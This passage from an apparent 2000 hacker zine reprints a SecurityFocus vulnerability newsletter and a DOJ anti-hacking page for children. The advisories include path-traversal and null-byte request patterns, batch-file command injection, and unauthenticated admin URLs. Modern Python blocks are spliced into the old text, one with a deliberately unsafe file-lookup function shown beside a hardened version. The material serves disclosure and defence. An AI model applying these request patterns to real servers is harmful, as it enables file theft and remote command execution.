      SUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][PURSUiT][P
      '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
      
      
      
      Well, we all hope you enjoyed the first issue of PURSUiT.
      Remember, you can always catch us on IRC, or email us.
      
      
      EOF
      
      
      @HWA      
      
115.0 SecurityFocus.com Newsletter 33
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      SecurityFocus.com, the premier security information portal, has a
      completely new look and more in-depth security content!  As part of our
      new site we have a free service which allows Solaris users to determine
      their security posture. Take a look at:
      
      http://www.securityfocus.com/sun/vulncalc
      
      SecurityFocus.com - It's all here and it's all free.
      
      
      I.   FRONT AND CENTER
      1. Info.Sec.Radio to interview head of Technical Security Branch
                 of Canada's Federal Police Force, the RCMP.
      II.  BUGTRAQ SUMMARY
      1. Linux atsar Input Validation Vulnerability
      2. RealServer Internal IP Address Disclosure Vulnerability
      3. NT Automated Tasks / Drive Mappings Vulnerability
      4. Atrium Software Mercur Mail Server 3.2 Buffer Overflow
         Vulnerability
      5. Sojourn File Access Vulnerability
      6. Oracle Web Listener Batch File Vulnerability
      7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability
      8. Microsoft SQL Weak Password Encryption Vulnerability
      9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow
         Vulnerability
      10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
      III.  SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
      1. The Coming Linux Plague (March 13, 2000)
      2. The Fine Print in UCITA (March 16, 2000)
      3. Sex Site Billing Companies Targeted By Russian Cybercrime
         (March 13, 2000)
      4. Information Freedom Catching On (March 16, 2000)
      5. Vast online credit card theft revealed (March 17, 2000)
      6. Hacker Finds a New Home for Stolen Cards (March 17, 2000)
      IV.  INCIDENTS SUMMARY
      1. Munged Napster Sessions (Thread)
      2. Undernet/telnet attempts?  (Thread)
      3. Strange RPC? service entries. (Thread)
      4. ingreslock message (Thread)
      5. lots of interest in port 109 (POP2)  (Thread)
      6. Mail and web server attack (Thread)
      7. Firewall (Thread)
      8. TCP port 3218 (Thread)
      9. Odd UPD scan (Thread)
      10. DUP packet replies at tvguide.com (Thread)
      11. Cracked; rootkit - entrapment question? (Thread)
      12. pop-2 scanning (Thread)
      13. Looking for Squid Proxies (Thread)
      14. TCP port 3218 (Thread)
      15. what are these? (Thread)
      V. VULN-DEV RESEARCH LIST SUMMARY
      1. Unwanted automagic processing (Thread)
      2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread)
      3. Hotline (Thread)
      4. Crashing Win9x (Thread)
      5. NT 4.0 (Workstation) Logon Authentication Vulnerability
         (Thread)
      6. Crashing Win9x with smbclient (Thread)
      7. Intel Corporation, Express 550 (Thread)
      8. spoofing the ethernet address (Thread)
      9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread)
      10. Exploiting any network protocol with secondary data channels
         (Thread)
      11. Buffer overflow in AIM 3.5.1856 (Thread)
      VI.   SECURITY JOBS
      VII.  SECURITY SURVEY RESULTS
      1. Which remote accessing service presents the greatest security
         risks?
      VIII. SECURITY FOCUS TOP 6 TOOLS
      1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
      2. SecurityFocus.com Pager (Win95/98/NT)
      3. Cold Fusion Scan 1.0 (Win95/98/NT)
      4. Atlas 1.0 (Win95/98)
      5. kfirewall 0.4.2 (Linux)
      6. cgi scanner 3.6 (UNIX/PERL)
      IX. SPONSOR INFORMATION - SecurityFocus.com
      X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
      
      
      I. FRONT AND CENTER
      -------------------
      
      1. Info.Sec.Radio to interview head of Technical Security Branch of
      Canada's Federal Police Force, the RCMP
      
      The show airs on Monday March 20 at 10am PST, 11am MST, 1pm EST.
      
      http://www.securityfocus.com/radio/
      
      II.  BUGTRAQ SUMMARY 2000-03-13 to 2000-03-20
      ---------------------------------------------
      
      
      1. Linux atsar Input Validation Vulnerability
      BugTraq ID: 1048
      Remote: No
      Date Published: 2000-03-11
      Relevant URL:
      http://www.securityfocus.com/bid/1048
      Summary:
      
      atsar is a Linux load monitoring software package released under the GPL
      by AT Computing. atsadc is a setuid root binary that is included in the
      atsar package. atsadc will accept as an argument an output file, which it
      will open -- without checking to make sure the user executing atsadc has
      the privileges to do so. After it has opened and created (or overwritten)
      the target file as root, the permissions set on the file will allow the
      attacker to write to it. Since this file is arbitrary, it is possible to
      gain root locally in any number of ways through creating malicious system
      files. In Teso's proof of concept exploit, root privileges are gained by
      creating a malicious shared library to be preloaded and
      creating/specifying that library in /etc/ld.so.preload (and then executing
      a setuid binary).
      
      2. RealServer Internal IP Address Disclosure Vulnerability
      BugTraq ID: 1049
      Remote: Yes
      Date Published: 2000-03-08
      Relevant URL:
      http://www.securityfocus.com/bid/1049
      Summary:
      
      By default, Real Server includes the IP address of the server in data sent
      to the client. If the Real Server is installed on a machine in a NAT
      environment, (where requests from the outside network are handled by
      reverse proxy), this will reveal what are supposed to be private, hidden
      IP addresses.
      
      3. NT Automated Tasks / Drive Mappings Vulnerability
      BugTraq ID: 1050
      Remote: No
      Date Published: 2000-03-14
      Relevant URL:
      http://www.securityfocus.com/bid/1050
      Summary:
      
      Any automated task that relies on mapped drives and runs at a higher
      privilege level than the logged-on user can be exploited by changing the
      drive mapping. By replicating the directory structure of the intended
      drive, and replacing the contents of the scheduled executables or
      configuration files with other data, it is possible for a local attacker
      to cause arbitrary code to be executed at an elevated privilege level.
      
      
      For example:
      \\Workstation has the following drive mapping:
      S: \\Server\Scripts
      and there is an AT job that runs S:\Daily.bat every day as the Local Administrator.
      
      Now all the attacker has to do is replace the S: mapping with one that
      specifies a target where the attacker has write privileges
      (\\Workstation\C$ for example). Then if the batch file C:\Daily.bat is
      created, it will be run as Local Administrator.
      
      
      4. Atrium Software Mercur Mail Server 3.2 Buffer Overflow Vulnerability
      BugTraq ID: 1051
      Remote: Yes
      Date Published: 2000-03-14
      Relevant URL:
      http://www.securityfocus.com/bid/1051
      Summary:
      
      Atrium Software Mercur is a SMTP, POP3, and IMAP mail server.
      Insufficient boundary checking exists within the login command, causing
      the application to crash if a string consisting of over 3000 characters is
      used as a username.  This affects both the POP3 and IMAP server in the
      Mercur mail server suite.
      
      5. Sojourn File Access Vulnerability
      BugTraq ID: 1052
      Remote: Yes
      Date Published: 2000-03-14
      Relevant URL:
      http://www.securityfocus.com/bid/1052
      Summary:
      
      Any file that the webserver has read access to can be read on a server
      running the Sojourn search engine.
      
      The Sojourn software includes the ability to organize a website into
      categories. These categories can then be accessed via the sojourn.cgi Perl
      script. This is done by making a request for a URL like:
      
      http ://target/cgi-bin/sojourn.cgi?cat=categoryname
      
      Each category has an associated .txt file based on the category name. The
      program appends the .txt extension onto the contents of the 'cat'
      variable. However, the program will accept and follow the '../' string in
      the variable contents, allowing read access to any .txt file the webserver
      can read.
      
      This restriction can be bypassed by appending %00 to the end of the
      requested file, which will prevent the .txt extension from being used in
      the filename.
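The two defects in the Sojourn entry, following `../` and letting a `%00` byte cut the appended `.txt` off the name, are both failures to validate one request parameter before building a path from it. The block below is an added example written for this edition, not Sojourn's code or SecurityFocus's; it places the unsafe "append .txt and open" pattern the advisory describes beside a hardened lookup, and exercises both against a constructed directory tree in a temporary folder. The category directory layout, file names and contents are all constructed. One caveat noted in the code: Python refuses NUL bytes in file names (ValueError), so the truncation effect of `%00` itself cannot be reproduced here, only rejected.

```python
"""Category-file lookup: the unsafe pattern from the Sojourn advisory beside a
hardened one. Added example, not Sojourn's code; the directory tree built by
demo() and its file contents are constructed."""
import os
import re
import tempfile
from typing import Optional

# Allow-list: category names are short and made of a fixed character set.
CATEGORY_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def unsafe_category_path(base: str, cat: str) -> str:
    """The pattern the advisory describes: append '.txt' to the request value
    and open it. '../' walks out of the directory, and in a C-level open() a
    NUL byte ends the string before '.txt' is ever seen."""
    return base + "/" + cat + ".txt"


def safe_category_path(base: str, cat: str) -> Optional[str]:
    """Hardened lookup: refuse NUL, allow-list the characters, then verify the
    resolved path is still inside the category directory (defence in depth,
    in case the allow-list is ever relaxed)."""
    if "\x00" in cat or not CATEGORY_RE.match(cat):
        return None
    root = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(root, cat + ".txt"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def read_category(base: str, cat: str, hardened: bool) -> Optional[str]:
    """Return the category file's text, or None if the lookup is refused."""
    path = safe_category_path(base, cat) if hardened else unsafe_category_path(base, cat)
    if path is None:
        return None
    try:
        with open(path, encoding="utf-8") as fh:
            return fh.read()
    except (OSError, ValueError):  # ValueError: Python refuses NUL bytes in paths
        return None


def demo() -> dict:
    """Build a constructed tree (categories/news.txt plus a secret.txt one level
    up) and compare what each lookup hands back for the same requests."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "categories")
        os.mkdir(base)
        with open(os.path.join(base, "news.txt"), "w", encoding="utf-8") as fh:
            fh.write("news category")
        with open(os.path.join(tmp, "secret.txt"), "w", encoding="utf-8") as fh:
            fh.write("not for the web")
        return {
            "unsafe_normal": read_category(base, "news", hardened=False),
            "unsafe_traversal": read_category(base, "../secret", hardened=False),
            "safe_normal": read_category(base, "news", hardened=True),
            "safe_traversal": read_category(base, "../secret", hardened=True),
            "safe_nul": read_category(base, "news\x00", hardened=True),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:18} -> {value!r}")
```

The allow-list does the real work; the `realpath`/`commonpath` check is there so that a later change to the pattern (say, allowing subcategory slashes) cannot silently reopen the traversal.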
      
      6. Oracle Web Listener Batch File Vulnerability
      BugTraq ID: 1053
      Remote: Yes
      Date Published: 2000-03-15
      Relevant URL:
      http://www.securityfocus.com/bid/1053
      Summary:
      
      Oracle Web Listener for NT makes use of various batch files as cgi
      scripts, which are stored in the /ows-bin/ directory by default.
      
      Any of these batch files can be used to run arbitrary commands on the
      server, simply by appending '?&' and a command to the filename. The
      command will be run at the SYSTEM level. The name of a batch file is not
      even necessary, as it will translate the '*' character and apply the
      appended string to every batch file in the directory. Moreover, UNC paths
      can be used to cause the server to download and execute remote code.
      
      
      7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability
      BugTraq ID: 1054
      Remote: Yes
      Date Published: 2000-03-11
      Relevant URL:
      http://www.securityfocus.com/bid/1054
      Summary:
      
      A vulnerability exists in which Checkpoint Firewall-1 will expose internal
      addresses to machines outside the network. Under seemingly normal load
      conditions, according to the poster of this vulnerability, 40% CPU
      utilization with 200+ active connections, Firewall-1 will attempt to
      establish connections utilizing the internal address. As this address is
      either non-routable, or internal, a retransmission will occur; this packet
      will have the correct address rewritten, but will use the same source
      port. Using this information makes it easy to determine the firewall
      behind which this address resides, as well as the internal address of the
      machine being utilized to establish the connection being seen. This may be
      particularly useful to attackers conducting client side attacks.
      
      These problems have been seen on both NT and Solaris versions of FW-1,
      although the poster indicated that not enough data was available to
      directly state the Solaris version was vulnerable in the same ways, or to
      the same degrees.
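The symptom the FW-1 entry describes is observable from the outside: a connection attempt arrives from a private (internal) source address, then the retransmission arrives from the public, rewritten address with the same source port to the same destination. A site operator can look for exactly that pattern in their own edge logs to learn whether their firewall is leaking. The block below is an added example written for this edition, not Check Point's code or the original poster's; the one-line-per-attempt log format, the 10-second pairing window and every address in the sample are constructed, and "internal" is taken to mean the RFC 1918 ranges (the documentation ranges used for the public addresses are deliberately not counted as internal).

```python
"""Detector for the internal-address leak pattern in the FW-1 entry above.
Added example, not Check Point's or the poster's code; the log format and
all addresses are constructed."""
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Tuple

# Constructed log lines: epoch seconds, src:sport -> dst:dport, one attempt per line.
SAMPLE_LOG = """\
953000001 10.1.2.3:33000 -> 203.0.113.80:80
953000004 198.51.100.1:33000 -> 203.0.113.80:80
953000010 198.51.100.1:33001 -> 203.0.113.80:80
953000020 10.1.2.9:33002 -> 203.0.113.25:25
953000035 198.51.100.1:33002 -> 203.0.113.25:25
953000040 172.16.5.5:44000 -> 203.0.113.80:443
953000041 198.51.100.1:44001 -> 203.0.113.80:443
"""

WINDOW = 10  # seconds: a TCP SYN retransmission follows within a few seconds (assumed)
RFC1918 = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
LINE_RE = re.compile(r"^(\d+) (\S+):(\d+) -> (\S+):(\d+)$")


def is_internal(addr: str) -> bool:
    """RFC 1918 only; the ipaddress module's is_private also covers
    documentation ranges, which would misclassify the sample's public hosts."""
    a = ip_address(addr)
    return any(a in n for n in RFC1918)


def parse_line(line: str) -> Optional[Tuple[int, str, int, str, int]]:
    """Return (ts, src, sport, dst, dport) or None for a line in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, sport, dst, dport = m.groups()
    return int(ts), src, int(sport), dst, int(dport)


def find_leaks(log: str, window: int = WINDOW) -> List[Dict[str, object]]:
    """Pair each internal-source attempt with a later public-source attempt
    that reuses the same source port to the same destination within `window`
    seconds; each pair is one leaked internal/public address mapping."""
    pending: Dict[Tuple[int, str, int], Tuple[int, str]] = {}
    leaks: List[Dict[str, object]] = []
    for line in log.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, sport, dst, dport = rec
        key = (sport, dst, dport)
        if is_internal(src):
            pending[key] = (ts, src)     # remember the unrewritten attempt
            continue
        prev = pending.pop(key, None)
        if prev is not None and ts - prev[0] <= window:
            leaks.append({"public": src, "internal": prev[1], "dst": dst,
                          "dport": dport, "sport": sport, "seconds": ts - prev[0]})
    return leaks


if __name__ == "__main__":
    for leak in find_leaks(SAMPLE_LOG):
        print(f"{leak['internal']} appears to sit behind {leak['public']} "
              f"(sport {leak['sport']} to {leak['dst']}:{leak['dport']}, {leak['seconds']}s apart)")
```

In the sample only the first pair is reported: the port-33002 pair is 15 seconds apart, outside the window, and the last two lines use different source ports, so neither looks like a retransmission of the other.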
      
      8. Microsoft SQL Weak Password Encryption Vulnerability
      BugTraq ID: 1055
      Remote: No
      Date Published: 2000-03-14
      Relevant URL:
      http://www.securityfocus.com/bid/1055
      Summary:
      
      If 'Always prompt for login name and password' is not set, and Windows
      Integrated Security is not being used, Enterprise Manager for SQL Server 7
      will save the login ID and password in the registry key
      HKCU\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server X. The
      algorithm used to encrypt the password consists of XORing each character
      with a two byte value dependent on the character's position in the string.
      
      If 'Always prompt for login name and password' is set, or Windows
      Integrated Security is used, the ID and password are not saved at all.
      
      
      9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability
      BugTraq ID: 1056
      Remote: Yes
      Date Published: 2000-03-16
      Relevant URL:
      http://www.securityfocus.com/bid/1056
      Summary:
      
      WebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail
      Server which allows a user to access email through a web browser.
      
      Insufficient boundary checking exists in the code which handles GET
      requests, specifically on port 1080.  Issuing a GET request containing a
      string of over 1000 characters on port 1080 will cause the WebView
      WebMail-Client application to crash.
      
      eg.
      http://target/&mail_user=<string containing over 1000 characters>
      
      10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
      BugTraq ID: 1057
      Remote: Yes
      Date Published: 2000-03-16
      Relevant URL:
      http://www.securityfocus.com/bid/1057
      Summary:
      
      Trend Micro OfficeScan is an antivirus software program which is
      deployable across an entire network. During the installation of the
      management software, the administrator is asked to choose between managing
      from a webserver or from a fileserver. If the webserver option is chosen,
      the administrator is given the capability to manage the OfficeScan network
      through an HTML interface.  This can be accessed by requesting the
      authentication form which is located at http://target/officescan/.  It
      prompts the user for the admin password, however it is transmitted in
      plaintext which can be intercepted by any user on the network running a
      packet sniffer specifically searching for the string "TMLogon=<password>".
      
      A larger problem exists in that any user with access to the web server is
      able to perform administrative functions without any sort of authorization
      simply by requesting specific URLs.  This is accomplished by requesting
      certain CGI files such as jdkRqNotify.exe.  A request for jdkRqNotify.exe
      in conjunction with a domain name on the network and an administrative
      event code number would allow any user on the network to perform certain
      administrative duties.
      
      eg.
      http://target/officescan/cgi/jdkRqNotify.exe?domain=<domain name>&event=<event code number>
      
      Examples of event code numbers are:
      11: Scan now
      12: Uninstall
      14: Roll back
      15: New alert message
      16: New intranet proxy
      17: New privilege
      18: New protocol
      19: New password
      20: New client
      
      
      III.  SECURITYFOCUS.COM TOP 6 NEWS ARTICLES
      --------------------------------------------
      
      
      1. The Coming Linux Plague (March 13, 2000)
      URL:
      http://www.securityfocus.com/commentary/2
      
      2. The Fine Print in UCITA (March 16, 2000)
      URL:
      http://www.securityfocus.com/commentary/4
      
      3. Sex Site Billing Companies Targeted By Russian Cybercrime (March 13, 2000)
      URL:
      http://www.securityfocus.com/news/3
      
      4. Information Freedom Catching On (March 16, 2000)
      URL:
      http://www.securityfocus.com/news/5
      
      5. Vast online credit card theft revealed (March 17, 2000)
      URL:
      http://www.msnbc.com/news/382561.asp
      
      6. Hacker Finds a New Home for Stolen Cards (March 17, 2000)
      URL:
              http://www.internetnews.com/ec-news/article/0,1087,4_323241,00.html
      
      
      IV.  INCIDENTS SUMMARY
      ----------------------
      
      1. Munged Napster Sessions (Thread)
      URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314021712.CF91B106FB@schadenfreude.meshuggeneh.net
      
      2. Undernet/telnet attempts?  (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=75B741AEA780D3118D6500508B4499A001965C75@cadillac.office.wxs.nl
      
      3. Strange RPC? service entries. (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313095534.5770.0@argo.troja.mff.cuni.cz
      
      4. ingreslock message  (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=38CD2727.26D3F760@RZ.RWTH-Aachen.DE
      
      5. lots of interest in port 109 (POP2)  (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313205308.24475.qmail@securityfocus.com
      
      6. Mail and web server attack  (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314135432.1709.qmail@securityfocus.com
      
      7. Firewall (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=Pine.GUL.4.21.0003142235580.21371-100000@red1.cac.washington.edu
      
      8. TCP port 3218 (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314232752.A6369@stwing.upenn.edu
      
      9. Odd UPD scan (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=BC60D9A2A99CD311BB6B009027B09D2F02CE85@sea1sa02.punchnetworks.com
      
      10. DUP packet replies at tvguide.com (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=200003151649.LAA18294@granger.mail.mindspring.net
      
      11. Cracked; rootkit - entrapment question? (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=D6C7B533F7C4D311BBD800001D121E7F0152D9@clmail.cmccontrols.com
      
      12. pop-2 scanning (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=20000315192246.524.qmail@securityfocus.com
      
      13. Looking for Squid Proxies (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=200003161445.GAA01133@cwsys.cwsent.com
      
      14. TCP port 3218 (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316120331.G.E.Fowler@lboro.ac.uk
      
      15. what are these? (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316232929.djk@tobit.co.uk
      
      
      V. VULN-DEV RESEARCH LIST SUMMARY
      ---------------------------------
      
      1. Unwanted automagic processing (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=12UQKA-0005iM-00@gate.westel900.hu
      
      2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=JEENLNLIMOLKDGAHKOCHEEPODAAA.marc@eeye.com
      
      3. Hotline (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBJPBMKLJJBCHBNEAIOEIGCCAA.jlintz@optonline.net
      
      4. Crashing Win9x (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315085426.29030.cpmta@c008.sfo.cp.net
      
      5. NT 4.0 (Workstation) Logon Authentication Vulnerability (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBIKOFOLKHBDNJIAKCEEJJCCAA.mrousseau@secured.org
      
      6. Crashing Win9x with smbclient (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315104542.B28738@trillian.adap.org
      
      7. Intel Corporation, Express 550 (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.LNX.4.10.10003151605360.32739-100000@inetarena.com
      
      8. spoofing the ethernet address (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.GSO.4.21.0003151412230.21920-100000@campus
      
      9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread)
      URL:
             http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D169B5.5B1E1727@nitnet.com.br
      
      10. Exploiting any network protocol with secondary data channels (Thread)
      URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D1FECA.6954A347@enternet.se
      
      11. Buffer overflow in AIM 3.5.1856 (Thread)
      URL:
              http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D52362.D0B1AEF2@rit.edu
      
      
      VI.  SECURITY JOBS SUMMARY 2000-03-13 to 2000-03-20
      ---------------------------------------------------
      
      This section is unavailable this week - missed entries will be included in
      next week's 'week in review'.
      
      VII.  SECURITY SURVEY 2000-03-13 to 2000-03-20
      -----------------------------------------------
      
      Which remote accessing service presents the greatest security risks?
      
      RPC/DCOM 21% / 34 votes
      Web (including CGI) 28% / 45 votes
      SSH 2% / 4 votes
      FTP 5% / 8 votes
      NFS/NETBIOS 20% / 32 votes
      Telnet (incoming) 20% / 32 votes
      
      Total number of votes: 156 votes
      
      
      VIII.  SECURITY FOCUS TOP 6 TOOLS 2000-03-13 to 2000-03-20
      --------------------------------------------------------
      
      
      1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT)
      by RedShadow
      Relevant URL:
              http://www.rsh.kiev.ua
      
      Shadow Advantis Administrator Tools - Ping (SSPing), Port Scanner, IP
      Scanner, Site Info (is intended for fast definition of services started on
      the host), Network Port Scanner, Tracert, Telnet, Nslookup,
      Finger, Echo, Time, UPD test, File Info, Compare File, Netstat, SysInfo, Crypt,
      Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info
      Shadow Hack and Crack - WinNuke, Mail Bomber, POP3, HTTP, SOCKS, FTP Crack
      (definitions of the password by a method of search), Unix password Crack,
      Finger over SendMail, Buffer Overflow, Smb Password Check, CRK Files
      ShadowPortGuard - code for detection of connection on the certain port
      Shadow Novell NetWare Crack - code for breaking Novell NetWare 4.x and
      more other functions
      
      
      2.  SecurityFocus.com Pager (Win95/98/NT)
      by SecurityFocus.com
      Relevant URL:
              http://www.securityfocus.com/pager/sf_pgr20.zip
      
      This program allows the user to monitor additions to the Security Focus
      website without constantly maintaining an open browser. Sitting quietly in
      the background, it polls the website at a user-specified interval and
      alerts the user via a blinking icon in the system tray, a popup message or
      both (also user-configurable).
      
      3. Cold Fusion Scan 1.0 (Win95/98/NT)
      by icos@arez.com
      Relevant URL:
              http://www.securityfocus.com/data/tools/cfscan.zip
      
      Cold Fusion vulnerability scanner is a program that will run down a list
      of words/domain names, and scan each one for an Allaire Cold Fusion
      misconfiguration.
      
      4. Atlas 1.0 (Win95/98)
      by Digital Monkey, dmonkey@arctik.com
      Relevant URL:
              http://www.securityfocus.com/data/tools/Atlas.zip
      
      A Windows/MS-DOS CGI scanner (binary only) which scans for 65 remote
      vulnerabilities.
      
      5. kfirewall 0.4.2 (Linux)
      by Kim Andre Norheim, kim-nor@online.no
      Relevant URLS:
              http://www.securityfocus.com/data/tools/kfirewall-0.4.2.tar.gz
              http://megaman.ypsilonia.net/kfirewall/
      
      kfirewall is a GUI front end for ipchains or ipfwadm (depending on your
      kernel version), in version 0.4.0 ipfwadm is removed. You can quickly and
      easily protect your computer against attacks and blocking of ports.
      kfirewall is easy and fast in use.
      
      6. cgi scanner 3.6 (UNIX/PERL)
      by CKS
      Relevant URLS:
              http://www.securityfocus.com/data/tools/auditing/network/cgichk3_6.tgz
              http://www.singnet.com.sg/~cksss/
      
      Cgi Scanner 3.6 is a simple program which facilitates the scanning of
      hosts on a network for known cgi vulnerabilities. Upon finding a given cgi
      program, the script will optionally download information from the author's
      web page, detailing the exploit. 3.6 includes a fix for a y2k problem in
      previous versions that would cause numerous false positives.
      
      
      IX. SPONSOR INFORMATION -  SecurityFocus.com
      --------------------------------------------
      
      SecurityFocus.com, the premier security information portal, has a new look
      and more in-depth security content.  Check out our redesigned site and new
      Solaris Focus Area.  Get the latest info on securing the Solaris OS--news,
      vulnerabilities, white papers--in one, easy-to-navigate area.  Click the
      Solaris tab on the home page.
      
      SecurityFocus.com-It's all here and it's all free.
      
      X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
      -------------------------------------
      
      1.  How do I subscribe?
      
        Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body
      of:
      
        SUBSCRIBE SF-NEWS Lastname, Firstname
      
        You will receive a confirmation request message to which you will have
      to answer.
      
      2.  How do I unsubscribe?
      
        Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
      address with a message body of:
      
        UNSUBSCRIBE SF-NEWS
      
        If your email address has changed email aleph1@securityfocus.com and I
      will manually remove you.
      
      3.  How do I disable mail delivery temporarily?
      
        If you are simply going on vacation you can turn off mail delivery
      without unsubscribing by sending LISTSERV the command:
      
        SET SF-NEWS NOMAIL
      
        To turn back on e-mail delivery use the command:
      
        SET SF-NEWS MAIL
      
      4.  Is the list available in a digest format?
      
        Yes. The digest is generated once a day.
      
      5.  How do I subscribe to the digest?
      
        To subscribe to the digest join the list normally (see section 0.2.1)
      and then send a message to LISTSERV@SECURITYFOCUS.COM with a message
      body of:
      
        SET SF-NEWS DIGEST
      
      6. How do I unsubscribe from the digest?
      
        To turn the digest off send a message to LISTSERV with a message body
      of:
      
        SET SF-NEWS NODIGEST
      
        If you want to unsubscribe from the list completely follow the
      instructions of section 0.2.2 next.
      
      7. I seem to not be able to unsubscribe. What is going on?
      
        You are probably subscribed from a different address than that from
      which you are sending commands to LISTSERV. Either send email from
      the appropriate address or email the moderator to be unsubscribed manually.
      
      
      
      Alfred Huger
      VP of Engineering
      SecurityFocus.com
      
      @HWA      
      
116.0 You can get into trouble for hacking!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This piece comes from the Dept of Justice website, quite amusing actually..

      Submitted by Sugarking

      http://www.usdoj.gov/kidspage/do-dont/reckless.htm
      
      YOU CAN GET IN REAL TROUBLE FOR HACKING!


      Some kids think they can't get into trouble for hacking computer 
      systems and that hacking big networks like the phone company, the 
      military, or NASA is harmless fun. But that's not true, as one teenager 
      in Boston found out recently.



      The hacker and some of his friends found a way to hack into a computer 
      that belongs to the phone company and that directs telephone traffic in 
      the Boston area. After he got into the system, the hacker decided to 
      reboot the computer, which basically made it crash. The first time he 
      did this, the hacker completely shut off phone service for six hours to 
      a regional airport so that the air traffic control tower had an 
      extremely hard time communicating. The second time he crashed the 
      computer, he cut off phone service to about 600 homes.



      The phone company reported this to the United States Secret Service, 
      which investigated the case and identified all the kids involved. 
      Although the Justice Department does not prosecute juveniles very 
      often, the United States Attorney's Office in Boston charged the 
      ringleader of the group with several serious crimes. 



      Even though the student won't go to jail, he did receive very serious 
      punishment: he lost his computer, must pay $5000 to the telephone 
      company, and must work in the community for free for 250 hours. He will 
      also be on probation for the next two years, and during that time he is 
      not allowed to use any computer with a modem. That means, of course, 
      that he is off the Internet and all other networks. 



      DON'T LET THIS HAPPEN TO YOU! If you think about it, it's pretty easy 
      to see why this student got into so much trouble. How would you feel if 
      you were one of the 600 houses that lost phone service? What if you 
      needed to call 911? How would you feel if you had been flying into the 
      airport that lost telephone service?



      The best way to stay out of trouble with computers is to imagine before 
      you do something how you'd feel if someone did it to you. You wouldn't 
      like it if someone opened your mail or looked into your bedroom 
      windows, and if you wouldn't do this either, don't hack into computers. 



      Lots of kids know enough about computers to hack into big networks, but 
      so what? It doesn't mean you're smart, it just means you don't mind 
      hurting other people--because it does hurt them. People are not going 
      to want to hire you to protect computers if you've been a hacker. It's 
      a question of trust, not skill.



      If you like computers, don't use your brains to hack systems, invade 
      other people's privacy, and take away their networks. Hacking can get 
      you in a whole lot more trouble than you think and is a completely 
      creepy thing to do. If you're so smart, use that computer to do great 
      things! 
   
      
      @HWA
      
117.0 SSHD v2.0.11< (old) Watch your version numbers!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: (Bugtraq Archives)
